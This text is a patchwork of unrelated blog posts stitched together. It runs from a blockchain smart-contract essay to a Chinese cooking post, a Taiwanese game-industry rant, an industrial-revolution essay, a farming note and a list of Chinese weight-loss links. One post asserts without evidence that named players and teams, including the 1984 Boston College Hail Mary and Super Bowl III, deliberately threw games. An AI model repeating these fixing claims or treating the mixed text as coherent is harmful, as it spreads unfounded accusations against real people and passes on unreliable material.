* Smart contracts: here users (typically two of them) agree via user interface to execute block chain code, which may include transfer of money and other chain-titled assets at various times or under various conditions, transfer and verification of other kinds of information, and other combinations of wet or traditional (off-chain) and dry (on-chain) performance. A block chain can hold cryptocurrency as collateral (like an escrow) which incentivizes off-chain performance that can be verified on-chain, by the parties or by third parties. A full block chain computer can pool on-chain assets into a single chain-controlled risk pool spread among many similar financial contracts, reducing the amount of collateral that needs to be stored on-chain while minimizing the need for off-chain collateral calls. The block chain can also make the search, negotiation, and verification phases of contracting more reliable and secure. With on-chain smart contracts we will be able to buy and sell many online services and financial instruments by button and slider instead of by laboriously filling out forms that disclose our private information.

* On-chain treasuries, trusts, and similar, where money lives on the block chain and is controlled by multiple signature ("multisig") authority.  Putting a treasury with signature authority on a block chain computer is low-hanging fruit, but is often tied to more speculative efforts under the label "distributed autonomous organization (DAO)", which may include voting shares and other mechanisms to control the treasury like a corporation or other kind of of organization.

I hope to discuss these block chain applications, especially smart contracts, in future posts. While there is much futurism in many block chain discussions, including many trying to solve problems that aren't actually solved by the block chain, I will generally stick to low-hanging fruit that could be usefully implemented on Quixcoin, Ethereum, or similar technology in the near future, often interfacing to still necessary parts of traditional protocols and institutions rather than trying to reinvent and replace them in whole.

References

Here is a list of basic computer science papers describing the technology of block chains (including cryptocurrencies).

Wet vs. dry code

Thursday, October 23, 2014

最近,我煮的。

好久没有更新部落格了,进来分享一些我煮的好料吧!现在什么都贵,所以我这个家庭主妇真的什么都要学会自己煮咯!

韩国煎饼
鸡蛋加面粉,水,胡椒粉,盐和起司粉调成面糊,然后加入包菜丝,洋葱,胡萝卜丝,煎到金黄色就可以了。这个两个妞有帮忙一起做哦!两个妞一直说好好吃!

鱿鱼蕹菜
这是我第一次做,买了一只八块钱的鱿鱼,块半钱的蕹菜,加上一点花生碎,就可以做出一大碟了。我第一次煮鱿鱼,打电话问了妈妈,她说:我几十年没有煮过,忘记了。我打电话问姐姐,她说:我不会,但是妈妈会,你问妈妈吧!结果我问了无所不知的谷歌大哥,就这样做出来了。老公非常喜欢哦!他对于我能够做出鱿鱼蕹菜感到非常惊喜,因为他已经好久没有吃过鱿鱼了。

培根煎蛋早餐
小妞说她没有吃过培根,所以我就买了培根,煎了荷包蛋做早餐。原来我没有买过培根来做早餐,第一次哦!她们当然说好吃!

酥炸多春鱼
这个就这样上粉炸,但是有点腥,没有日本餐厅做得好吃,上面是起司酱。


肉包子
一个无聊的下午,我又做了肉包子,老公和女儿说我做的包子越来越像样了,嘻嘻,开心!


凉拌海燕窝
这个制作过程复杂,这个做了就只有自己吃。

干咖喱羊肉
下雨天的时候,真的会很想吃咖喱,尤其是羊肉。

小妞做的披萨
买了现成的饼皮,上面的料让小妞自己切,自己放,就这样变成我们某一天的晚餐。

Tuesday, October 21, 2014

[感想]從世界某個角度看看台灣...



好久沒打文章啦,換了工作之後就開始變得非常忙碌,這次想打一篇文章完全跟專業知識無關的文章,所以也許你不會那麼想睡覺。我想要講的東西稍微感性一些些。

首先要嘆口氣,當年想的事情其實都差不多成真了。大陸公司與資金似乎已經統治台灣市場,多數廠商存活卻極度缺乏內容,受限於體質的關係很多廠商依然死守著台灣市場。不要會錯意,台灣是塊精華肥肉,很小、很好進入、報酬率也相對算高的市場。但正因為如此,死守台灣的廠商會面臨極多的挑戰:一、世界一流內容中文化與在地化。二、中國大陸的內容進入台灣的門檻很低。三、競標式的廣告投放趨於主流,行銷費用的高漲。四、符合中華文化的產品不見得適合除了中國其他市場,但中國市場相對混亂,台灣廠商掌握度很低。真正適合國際市場的主流產品,台灣真的很缺乏一個成功典範。



另外,相對來說,對台灣廠商來說機會也開始變少:一、兩三年前Mobile剛起步大家同時都在摸索期,其實進步速度差不多,現在日韓在遊戲方面以及歐美在應用方面的學習能力與進步速度和中國廠商的集資速度是台灣廠商無法追上的,而我個人感覺距離只會越拉越開。二、人才的出走,過去台灣廠商還有很多不錯的人才,開發能力還算稍微足夠,但近年來面臨對岸大公司或是外商的台灣分公司挖角,現在剩下來的開發人員又少了一大半,未來要開發出好的產品,關於教育這方面就很重要。三、代理權的競爭優勢大幅削弱,現在只要內容夠好,很多遊戲都是全球統一發行一個版本、多國語言,在地化的操作容易取代,FB、Youtuube、Admob等主流媒體都可以跨國購買。甚至是直接在台開設分公司、或請Agency代為操作都可以取代代理授權這個模式。四、資本競爭,先撇開中國資金如何透過海外管道進到台灣來並且規避金管會與工業局的稽查,光是其他任何海外做出名堂的遊戲公司的資本都是可以輕易砸死台灣廠商的,如果要靠資本競爭,以前台灣還有點封閉的時候行得通,大型的發行商的確有那麼點優勢,現在台灣最大的發行商面對國際上的強者頂多是個小蝦米。不是要妄自菲薄,而是應該想想其他的戰略方式。拿自己的短槍去硬碰別人的洋屌是不會贏的。(謎:我們東方人的是比技巧的!)(鄉民:還有膨脹率)

第三段來談談我覺得開發商要重視創造價值與捕獲價值:

第一點、別再開發遊戲平台了,台灣這個地方,做遊戲平台很難成。原因很簡單:相信我準沒錯。不然你看看國際上也有前例,DeNA、GREE,這種要跟大平台搶Distribution的事情做了難成,就算成了難長久。平台始終會設法保有獨佔性,除非你做出一個超強的平台可以獨佔市場,如果沒那個idea就別勉強。而就算你想把Kakao或是Line視為平台,那也是建立在產品之上,本身這個IM軟體不成功,管你上面有多少遊戲也都是會Fail。

作平台需要有四個特性:一、強有力的取得用戶(Acquire User) 二、留存用戶(Retain User) 三、Engage User(不知道中文怎麼說才好,黏著?) 四、付費模型Monetize。台灣大部分現在的平台都沒有以上這些功能,取得用戶是靠下廣告的,下完廣告後產品本身留不住客戶,而服務本身沒辦法持續Engage用戶,付費模型通常已經不重要。舉例來說,LINE、Kakao模型為什麼會成功,免費訊息對早期取得用戶很有力,產品本身特形很吸引人,LINE有可愛貼圖、產品有的服務也算滿足大部份需求。而產品特性是IM,所以很容易Engage用戶去使用這個產品,一收到心儀的女生傳來的貼圖,馬上就會打開這個產品。(實在很不想舉LINE,超級老掉牙,但我覺得最平易近人。)

反之,為什麼人家要安裝/打開你的平台?如果你無法回答這個問題,就把專案砍了吧。

第二點、別再只想開發出好遊戲這件事情了。喔,我不是說要開發爛遊戲啦,我是說,要想想格局問題,台灣廠商接下來會遇到的問題完全跟Scalability有關。譬如說,對於連線速度的穩定性,大量仰賴台灣在地的IDC,那麼當你要拓展到東南亞的時候呢?或是你的商業模式大量的獲利來源來自點卡,那麼沒有點卡的國家,你可以運行的好嗎?內容文化上符合嗎?提供的解決方案有這個需求嗎?同樣關於Scalability,看過許多國外的產品在設計之初就已經想好很多事情了。像我曾經看過兩個App,都是航班資訊,UI介面、技術、服務都差不多,一個卻是僅限於香港地區,一個卻是國際任何機場都可以查,這一種狀況是產品本身就限制自己的Scalability。

另外一種是心態,有的開發商很喜歡搞鬼,有的開發商是想搞鬼又不知道怎麼搞比較好,有的是沒心思搞鬼,有的是真的知道怎麼搞卻已經發現不搞鬼的好處。像是有聽到某人跟我說XGG公司的老闆曾說不需要再搞鬼了,他們現在是放眼做全球的生意。這種心態是一種格局問題,心態會造就你的格局。不相信嗎?我舉個例子,有的遊戲喜歡搞一堆Spam,把User的通知畫面Spam的亂七八遭,好像因為誤擊所以Engagement變高,但認真看,這種應用的反安裝率都超級高,品牌、評價也會爛掉。有的遊戲喜歡刷榜,刷一刷到很高的名次,玩家進去也是發現很爛,久了玩家也不會相信排行榜這種東西,刷了也等於白刷。有的遊戲喜歡搞一些腥羶色,認為這樣很有效,你覺得這種東西出得了台灣中國嗎?走得進先進國家嗎?

你有發現那些真正具有Scalability的公司,不搞這套的嗎?今年可以繼續這樣搞,明年還可以這樣搞,兩三年之後,你會發現台灣被這些有Scalability的公司給統治。台灣最大的戀愛交友網,台灣最大的美食網,台灣最大的新聞網,台灣最大的音樂網,RIP。想想當年的洋芋片波的多...

第三點、內容為王,通路是神,金流只能當個見錢腿開小婊子。認真認為,台灣還是需要更重視內容的開發,台灣還是有極少數的專心作內容的廠商有取得國際級的認同,像是雷亞科技 (耶,又是老掉牙),但我要說得很簡單:通路為了取得/留存/Engage用戶,會非常注重通路裡面提供的內容品質,所以呢?就會很看重能夠開發出優質內容的開發者。通路如果包含商店,就會連金流都自己做掉了。近期蘋果整合自己的錢包之後,擋者披靡啊。金流商未來只靠攏平台商或是強勢內容、服務,但平台商假設擁有的整合能力比較強就沒有理由使用台灣任何金流商的Solution,舉例來說,Apple Pay會去整合台灣那些銀行推出的NFC結帳功能嗎?而當內容商需要面對平台商與金流商的利益衝突,強勢的內容商會選擇誰呢?當第三方支付法案通過後,Apple Gift Card與Google Play Gift Card進來之後,台灣點卡商的生意呢?難道認真以為可以像大陸一樣經營APK市場與JB市場?尤其是當Android跟Apple已經開始水平整合所有Device時,真的可以跟上腳步?尤其是當內容都已經全球化之後呢?這是一個規模戰爭啊,沒那麼等級別推這個副本啊。

想想看,SUPERCELL會接MXCARD嗎?Candy Crush會需要接Beanfux登入嗎?以前挾帶網路會員平台優勢的時代已經過去了,擁抱認真做內容的時代吧!到時候要真的是設備商統一金流,那也是無可奈何的事。

第四點、重視UX/UI,我不是這方面的專家,但也因為工作的關係接觸不少Case。先撇除掉複雜的遊戲體驗與介面設計。光是登錄流程,台灣廠商就問題一大堆。這種東西是初期轉換率最指標性的東西,卻完全沒有聽過有廠商有在追蹤這個Funnel,有些大概知道的也對於A/B Testing的科學化優化鮮少下功夫。這都不知道,到底要以甚麼為依據決定要不要Scale呢?(Guts?)

關於UX/UI的優劣又非常用台灣人的眼光看待,這又會回歸到Scalability的問題:也許台灣人看很習慣,出了台灣呢?

我記得有一次貼了我們公司新產品的介紹網站,非常精簡的設計,我一個朋友就說:這網站設計怎麼這麼爛?除了標價、一張圖片和購買按鈕以外甚麼都沒有!

這真的是品味問題,台灣人去看中國大陸網站也會覺得頭昏眼花,西方人看台灣的網站也會覺得如此。但大陸市場封閉且很大阿,台灣呢?你依然要堅持自我嗎?

最後一個段落:啊靠杯,我是代理商怎麼辦呢?

一、趁你現在還很有錢,買很多開發商,開始規劃你的全球布局。但中國大陸廠商能開比你更高的價錢。
二、開始招人養團隊。但你要跟中國大陸廠商搶人才。
三、進軍東南亞,去跟大陸人打架。但你的武器還是要跟中國大陸進口。
四、與強力開發商策略性投資結盟,保護產品線。但這有正反兩種例子,不見得有好事。
五、卸甲歸田,去賣油。可以跟大陸的地溝油一分高下。
六、繼續代理,然後只能越代理越爛的遊戲。大陸廠商可以出的價錢永遠比你多一點。
七、日據時代,日本廠商目前相對性信任台灣廠商,保持關係很重要。但錢更重要(?)

不是針對你啦,你去看看成熟市場的發行商,沒有挾帶內容產能的都會死掉。看看Zynga那時候IPO那麼多錢,還好有買下CSR Racing不然早掛了。看看當年很邱的6 waves,現在在哪裡?也是一個從零開始的概念,一點優勢也沒有。聰明一點的像是Happy Elements搞了一些日本產品的開發,現在成績很好。

總結:雖然有些人感覺到冬天回暖了,那也只是因為外國內容商暫時妥協與裝置市場爆發行成長的假象。本質上台灣的經濟體系是沒甚麼改善的,核心能力提升的速度明顯落後。我替沒內容控制權的台灣廠商感到憂心,然後對內容開發者的學習速度感到不樂觀,對於1 to 100擴增規模這件事情除了資本與技術方面來說,更懼怕的是台灣廠商的心態與格局。然後對於很少看到Zero to one的創意與創業家覺得可惜。最後關於創造價值與捕獲價值這件事情,我想分享這段影片:

Thursday, October 16, 2014

Transportation, divergence, and the industrial revolution

After about 1000 AD northwestern Europe started a gradual switch from using oxen to using horses for farm traction and transportation.  This trend culminated in an eighteenth-century explosion in roads carrying horse-drawn carriages and wagons, as well as in canals, and works greatly extending the navigability of rivers, both carrying horse-drawn barges. This reflected a great rise in the use of cultivated fodder, a hallmark of the novel agricultural system that was evolving in northwestern Europe from the start of the second millennium: stationary pastoralism.  During the same period, and especially in the seventeenth through nineteenth centuries, most of civilized East Asia, and in particular Chinese civilization along its coast, navigable rivers, and canals, faced increasing Malthusian pressures and evolved in the opposite direction: from oxen towards far more costly and limited human porters. Through the early middle ages China had been far ahead, in terms of division of labor and technology, of the roving bandits of northern Europe, but after the latter region's transition to stationary pastoralism that gap closed and Europe surged ahead, a growth divergence that culminated in the industrial revolution.  In the eighteenth century Europe, and thus in the early industrial revolution, muscle power was the engine of land transportation, and hay was its gasoline. 

Metcalfe's Law states that a value of a network is proportional to the square of the number of its nodes.  In an area where good soils, mines, and forests are randomly distributed, the number of nodes valuable to an industrial economy is proportional to the area encompassed.  The number of such nodes that can be economically accessed is an inverse square of the cost per mile of transportation.  Combine this  with Metcalfe's Law and we reach a dramatic but solid mathematical conclusion: the potential value of a land transportation network is the inverse fourth power of the cost of that transportation. A reduction in transportation costs in a trade network by a factor of two increases the potential value of that network by a factor of sixteen. While a power of exactly 4.0 will usually be too high, due to redundancies, this does show how the cost of transportation can have a radical nonlinear impact on the value of the trade networks it enables.  This formalizes Adam Smith's observations: the division of labor (and thus value of an economy) increases with the extent of the market, and the extent of the market is heavily influenced by transportation costs (as he extensively discussed in his Wealth of Nations).

The early industrial revolution was highly dependent on bringing together bulk goods such as coal and iron ore.  Land transportation of such materials more than a dozen miles in most parts of the world was prohibitively costly, and they were only rarely located a shorter distance from navigable water (the costs per mile of water transport were generally orders of magnitude cheaper than the costs per mile of of land transport).  As a result, the early industrial revolution, and the potential for a region to be the first to industrialize, was very sensitive to small changes in land transportation costs.

Furthermore, land and sea-borne transportation were far more complements than substitutes.  Cheaper land transportation was a "force multiplier" for water transportation.  Decreasing the costs of getting to port from field or mine by a factor of two increased the number of fields and mines accessible by a factor of four, and increased the number of possible ways to divide labor, and thus the value, by an even greater factor via Metcalfe's law.  This in turn incentived greater investment in sea-borne transport. It's thus not surprising that, even before the industrial revolution, the leaders in global trade and colonization were European countries that could access the Atlantic.

By the dawn of the industrial revolution in northwest Europe the effects of horse haulage had already been dramatic: drop by a factor of two in the costs, and increase in speed by about the same factor, of transporting goods by land, the corresponding increase in commercial crop area and in area that could be economically lumbered and coal and metals that could be mined.   Multiply that factor of four by much more when we factor in (1) innovations in wheels, tires, shock absorption, and road building that followed on the heels, as is were, of the great increase in horse haulage, and (2) the great increase in mileage and inland penetration of navigable rivers and canals, especially in the 18th century, the barges again hauled by horses.  And as Metcalfe's Law suggests, the number of combinations, and thus the value, increased by a far greater factor still. Not only did northwestern European ports have access to far more land, but there were far more ports far more "inland" along rivers and canals, thanks again chiefly to the draft horses and the nutrient-rich cultivated fodder that fed them.

To enable the industrial revolution, mines and nutrient-dense fodder had to be colocated within efficient bulk transport distance of each other — which in the case of horses hauling coal or wood by rural road, was typically less than twenty miles, and for oxen and human porters far less still — to produce the low-cost bulk transportation networks needed to make industrial revolution scale use of most commercial crops and mines. Efficient bulk transportation is needed _all the way_ between the iron mine, the coal mine, and the smelter.  Because the cost per mile of water transport was so much smaller than the costs of land transport, this “last few miles to the mine” problem usually played a dominant role in transportation economics, somewhat analogous to the “last mile” problem in modern cable networks. That’s why stationary pastoralism with its efficient markets for nutrient-dense (because cultivated) fodder was such a huge win — it allowed horses to be housed at the mines, canals, roads, and factories where they worked, which no place in the world outside Europe could during that era do.  Nutrient-dense fodder created a virtuous recursion, enabling itself to be harvested (via horse-drawn mows and rakes) and transported to mine, factory, and stable at increasingly lower costs.

Industrialization came in many phases. Very roughly speaking, the first phase, in the latter half of the eighteenth century, involved the culmination and optimization of the use of horses, by northwestern Europe, and especially England, greatly expanding its horse wagon and carriage roads and horse-drawn barge canal networks.  Horses brought coke or charcoal and iron ore to the smelters. Horse-powered capstans performed some arduous farm tasks such as threshing. Along with primitive Newcomen steam engines they pumped coal mines. Horse gins also powered most of the early versions of innovative textile machinery (they switched to more power-efficient water mills when they later scaled up).  That classic carnival ride, the merry-go-round, was inspired by these perpetually circling horses.

Again roughly speaking, the second phase of industrial growth, after about 1830, was more scientific and far easier to copy than northwestern Europe's unique biology: steam engines came to replace horse gins and water mills for running industrial machinery, and the steam-powered railroad radically lowered transportation costs between major mines, factories, and urban centers. When non-European countries industrialized, such as Japan after the 1870s, they did it in a "leap-frog" style: they skipped over the long-evolved improvement in draft animals and went straight to mature steam engines and, soon thereafter, electrical motors.  Much as countries installing phone networks for the first time over the last few decades have leap-frogged over the land line era, going straight to cell phones. Starting early in the 20th century industrializing countries could replace all the remaining important functions of the horse with internal combustion engines.  England, which made the longest and most thorough use of the horse, and thereby had the transportation economies allowing it to pioneer the industrial revolution, had a less pressing need to use the internal combustion engine and thus lagged enough in that technology so that second-generation  industrializers like Japan, Germany, and the United States became leaders in internal combustion engine products.

Given the scientific nature of the second phase of the industrial revolution, which could be discovered by any culture full of literate craftsmen, this second phase was more technologically inevitable and didn't ultimately depend on northwestern Europe's unique biology.  At the same time, during the long evolution that culminate in the industrial revolution, and during its first phase, land transportation the world over was muscle powered and the unique system of stationary pastoralism, by breeding draft horses that ran on cultivated, nutrient-dense fodder, substantially lowered transportation costs. This allowed the value of northwestern Europe's bulk transportation networks to radically increase and made it very nearly as inevitable that that region would be the pioneers of the industrial revolution.

Hat tips and references: Edward Wright and Raymond Crotty among many other authors have explored some of these issues.
Raymond Crotty
Raymond Crottyamong many other authors have explored some of the issues.

The romance vs the reality of farming

I'm in the middle of a visit to Cape Breton, Nova Scotia. It's a tremendously scenic place and the people here are amazingly friendly and welcoming. 
Near Whale Cove, Nova Scotia

It is also a place that historically has send many of its sons and daughters away to find work elsewhere. Buildings have fallen to ruin and once-cleared farmland has reverted to woody perennials. Which reminded me of a quote one of my Caper friends gave me.
Romance vs Reality (quote from My Remarkable Uncle, 1942 )

Too many, I'm afraid, have a view of agriculture and food production that's more romantic than realistic. Folks who can afford to move back to the country, plant a garden, tend an orchard, and raise a few animals are blessed. But they aren't the same as folks who are doing that for a living. Nor is their life and the lives of their family members dependent upon what they produce. Subsistence farming is NOT secure.

There's a difference between farming WITH money and farming FOR money.

I'm hoping to get back to posting more regularly ...

Edits: 1. Corrected title of Leacock's book; 2. Corrected error in second to last sentence (thank you, @OnlookerfrTroy !).

Wednesday, October 1, 2014

Hail Mary Hoaxes, Super Bowl III and More Michigan Meltdowns

The Miami Hurricanes threw that Hail Mary game against Boston College in 1984 to enhance the Doug Flutie legend and ensure that college football would have a nice-looking, clean-cut, All-American boy as the Heisman Trophy winner that year.

Doug Flutie
I'm not saying Flutie wasn't a great quarterback. In fact, he's one of my all-time favorite players because he had so much heart and football savvy. It was especially inspiring to see him out there playing against all those big guys and outsmarting everybody because he was only 5 feet 10. The classic underdog.

But on that final play, I'll always believe the Miami secondary deliberately let Gerard Phelan get behind them to catch the game-winning pass. That's not how you defend the Hail Mary. You stay behind the receiver at all costs and knock the ball down if necessary. Those players knew that, and still they let Phelan get behind them for the easy game-winning catch. Watch the replay here: http://www.youtube.com/watch?v=q3ykWbu2Gl0

There was another obvious Hail Mary Hoax in the Cincinnati-Baltimore game on Nov. 10, 2013. Ravens safety James Ihedigbo, a veteran player in his sixth NFL season, tipped a deflected pass high in the air so it could be caught by the Bengals' A.J. Green for the tying touchdown.

All Ihedigbo had to do to ensure a Ravens victory was to let the ball fall harmlessly to the ground or bat it down. By deliberately tipping it back into the air, he allowed Green to score. You'd have to be pretty naive to believe that play was on the level. Read all about it and watch the replay here: http://www.huffingtonpost.com/2013/11/10/bengals-hail-mary-aj-green-james-ihedigbo_n_4251721.html

And don't forget the Hail Mary on the last play of the game that allowed Colorado to defeat Michigan 27-26 in 1994. Watch as the Michigan secondary leaves Michael Westbrook wide open to catch the deflected pass. Instead of everybody going for the ball, someone should have been on Westbrook to knock the ball down if it bounced his way. See the slow-motion replay here: http://www.youtube.com/watch?v=5Nt6HjqtJt8

Also, why is it that defensive teams always rush the passer with only three linemen when it's obvious a Hail Mary is about to be attempted? If I were a defensive coordinator, I'd blitz the quarterback so the receivers wouldn't have time to reach the end zone, let alone make a "miraculous" game-winning catch. That wouldn't make for a very exciting finish though, would it?

For example, check out this Hail Mary Hoax that allowed Auburn to escape with a win over Georgia on Nov. 16, 2013. Auburn trailed 38-37, and it was fourth down and 18 from their own 27-yard line with 36 seconds left in the game. Georgia rushes only three defenders, and watch the one in the middle. He just stands there! That means there were only two defenders rushing the passer! Watch the replay here: https://www.youtube.com/watch?v=XkpDz8YyVD8

Isn't it obvious that Georgia wanted to give Auburn a chance to complete the Hail Mary? All the Georgia secondary had to do was let the pass fall harmlessly to the ground and they would have won the game. Instead, they deliberately tipped it to the Auburn receiver and let him waltz into the end zone for the winning score.

LOL! Are sports fans really that naive? A second-grader could see it was all a hoax!

Speaking of hoaxes, there were two glaring examples of fixed games in the early years of the Super Bowl to give the old AFL teams more credibility after they merged with the NFL. The Baltimore Colts threw the Super Bowl to Joe Namath and the New York Jets in 1969, and the Minnesota Vikings threw the 1970 Super Bowl to the Kansas City Chiefs.

No wonder Namath boldly predicted the Jets would win in 1969, even though they were 18-point underdogs. He probably knew the fix was in.

It's even worse today.

Another thing that happens is that key players fake injuries to hurt their team's chances and give the team an excuse for losing the game. And coaches cooperate by failing to make obvious strategy adjustments and taking a laissez-faire attitude when their team starts to go into meltdown mode.

For example, in their "loss" to Ohio State in 2012, Michigan kept trying to run the ball up the middle in the second half with little success, despite having great success in the first half by throwing the ball and running wide. After scoring 21 points in the first half, they were shut out in the second half because of play-calling that appeared to be stupid, but was actually deliberate. It was designed to fail.

Michigan was forced to throw all its losses in 2013, including the 17-13 "loss" to Nebraska. Devin Gardner, easily one of the quickest, fastest and most agile quarterbacks in the country, inexplicably forgot how to elude the pass rush in this game. When he's not actually trying to get sacked, he's adept at dodging tacklers. Just ask Notre Dame and some of the other teams he's exploited during his career at Michigan.
Devin Gardner runs for a big gain against Notre Dame.
But Gardner also has been instrumental in throwing some games and keeping the score close in others. His ridiculous "mistake" against Notre Dame in 2013 kept that game close when he threw a pass high up in the air toward a gang of Notre Dame players as he was being tackled in the end zone. He could easily have thrown the ball into the turf or even taken a safety. Instead, Notre Dame intercepted for an easy touchdown. Watch the replay here at the 1:30 mark: http://www.youtube.com/watch?v=iP6JrFrtmd4

And then there was the badly overthrown, deliberate interception that sealed the Ohio State loss in 2012: http://www.youtube.com/watch?v=U06UyVx8WIk Not to mention the interception he deliberately threw to the Ohio State secondary on the 2-point conversion play that would have won the game in 2013 if it had been successful.

And the deliberate fumble that led to a touchdown against Connecticut, shown here at the 0:50 mark: http://www.youtube.com/watch?v=8L3lE0l-3bY

Against Nebraska and Michigan State. it didn't help that the offensive line suddenly forgot how to protect the quarterback.

Are we really supposed to believe Nebraska's defense and Michigan State's defense are both just too strong and fast for a Michigan offense that scored 63 points on Indiana, 59 on Central Michigan and 40 or more points against Notre Dame, Penn State and Minnesota? That all they could muster against their archrival, Michigan State, was two lousy field goals in the biggest game of the season? That they could be shut out for the entire second half? I'm not buying the cover story for one instant, and you shouldn't either.

And how about Notre Dame being ordered to stand down at home against perennial patsy Navy last season, struggling to win 38-34, one week after blowing out Air Force 45-10 at Colorado Springs? And then losing to Pittsburgh, 28-21 -- a team that gave up 55 points against Duke earlier this season.

Michigan also shaved points against Akron on Sept. 14, 2013, when they struggled to win at home, 28-24, despite being a 37-point favorite. Reminds me of that time they "lost" to Appalachian State a few years back. Another obvious hoax. Do you really think Appalachian State and Akron would have had a chance in those games if Michigan hadn't been required to throw the game or keep it close?

Some of the other obvious hoaxes last season include losses by three teams that were in danger of qualifying for the BCS Championship Game. Clemson got blown out at home by Florida State, Stanford lost to Utah, 27-21, and then Oregon lost to Stanford, 26-20. The NCAA doesn't like having too many undefeated teams because it creates controversy over the corrupt BCS system.

I'm going to go out on a limb today (Nov. 17, 2013) and predict that either Alabama, Florida State or Ohio State will lose before the BCS Championship Game matchup is finalized. The reason why I say that is, unless one of them loses, we'll have three undefeated teams, and one will be left out of the championship game, creating more controversy for the already beleaguered and corrupt system.

Make that five teams that are undefeated, including Baylor and Northern Illinois. Baylor will probably lose, too, because I doubt that the NCAA wants to see Baylor in the championship game. We'll see. Northern Illinois might be allowed to go undefeated, since they're in the Mid-American Conference and won't create too much controversy when they get shut out of the BCS title game.

(Editor's note: Sure enough, the prediction I made on Nov. 17 came true, because Baylor got trounced by Oklahoma State in a highly suspicious game on Nov. 23, and Alabama lost to Auburn in another crooked game on Nov. 30 when they allowed a 100-yard touchdown on the last play of the game.

That left Florida State and Ohio State as the only two undefeated teams left from the so-called power conferences going into Dec. 7, but then the Buckeyes lost to Michigan State, so that left FSU as the only undefeated team. Northern Illinois got hammered by Bowling Green in another fixed game to knock them from the ranks of the undefeated.

Ohio State's loss opened the door for Auburn to qualify for the BCS Championship Game, thanks to the Tigers' fraudulent last-second victories over Georgia and Alabama. I have no idea why, but it's obvious that the powers that control college football wanted Auburn in the title game this season.)

I remember when big plays hardly ever happened. Titanic defensive struggles were the order of the day. Now, almost every game features a touchdown of 50 yards or more as defensive players suddenly find they're unable to make an open-field tackle.

I guess the NFL and the NCAA think the games are more exciting with all these big plays happening. But I don't. There was time when a 75-yard touchdown run meant something. Now it's just another example of corruption.

Friday, September 19, 2014

水果瘦身部落格汇总

     http://ssw5.blogspot.com.au/2014/08/AutumnWeightLossMainPoints.html#.U-6cKPmSzEY   http://ssw5.blogspot.com.au/2014/08/AutumnWeightLoss5Foods.html#.U_n61fmSzEY http://ssw5.blogspot.com.au/2014/09/CeleryWeightLossRecipes.html#.VAsIf_mSzEY
                         秋季减肥要点                                         5种秋季减肥食物                                         芹菜减肥食谱                      

    
       
    http://ssw5.blogspot.com.au/2014/08/StarZhaoWeiWeightLossSuccess.html#.VAH1Q_mSzEY http://ssw5.blogspot.com.au/2014/08/VitaminDiet.html#.U-nAFvmSzEY http://ssw5.blogspot.com.au/2014/09/ChineseCabbageDiet.html#.VAWhsvmSzEY  
                    明星赵薇瘦身成功                                      维生素吃出瘦子                                               白菜减肥法                   



    http://ssw5.blogspot.com.au/2014/08/8kindsOfTheBestDietFood.html#.U-iwD_mSzEYhttp://ssw5.blogspot.com.au/2014/08/TheMostHealthyDiet.html#.VAMJd_mSzEY  http://ssw5.blogspot.com.au/2014/08/BigSWeightLossHaveCoup.html#.U_XehvmSzEY
                             不节食就能瘦                                            最健康减肥法                                             大S瘦身有妙招                     


    http://ssw5.blogspot.com.au/2014/09/BellPepperDiet.html#.VAhG7fmSzEY  http://ssw5.blogspot.com.au/2014/09/ChineseCabbageDiet3.html#.VAb9iPmSzEY8  http://ssw5.blogspot.com.au/2014/08/EuropeanAndAmericanAtarsWeightLossNotThinBreasts.html#.U_8R8fmSzEY
                             尖椒减肥法                                              周瘦8斤食谱                                             明星瘦身不瘦胸             

    
    http://ssw5.blogspot.com.au/2014/09/TomatoDiet.html#.VARQ5vmSzEY http://ssw5.blogspot.com.au/2014/07/SlimmingWaysBySpectrum.html#.U9oxSPmSzEY  http://ssw5.blogspot.com.au/2014/07/FishLeongQuickWeightLoss.html#.U9jYOfmSx3M
                             蕃茄减肥法                                            靠谱瘦身方式                                           梁静茹快速瘦身                    

    
       
    http://ssw5.blogspot.com.au/2014/07/10KindsOfUltra-LowCardDietFood.html#.U9ZgpvmSzEY http://ssw5.blogspot.com.au/2014/07/TheNewMomSlimmingEightBigMistake.html   http://ssw5.blogspot.com.au/2014/07/ThefastestWeightLossMethod.html#.U8xvpvmSzEY
                      超低卡减肥食品                                    新妈瘦身的八大误区                                    最快减肥瘦身方法                      

                                                                                                                                                                                                                 ...More>>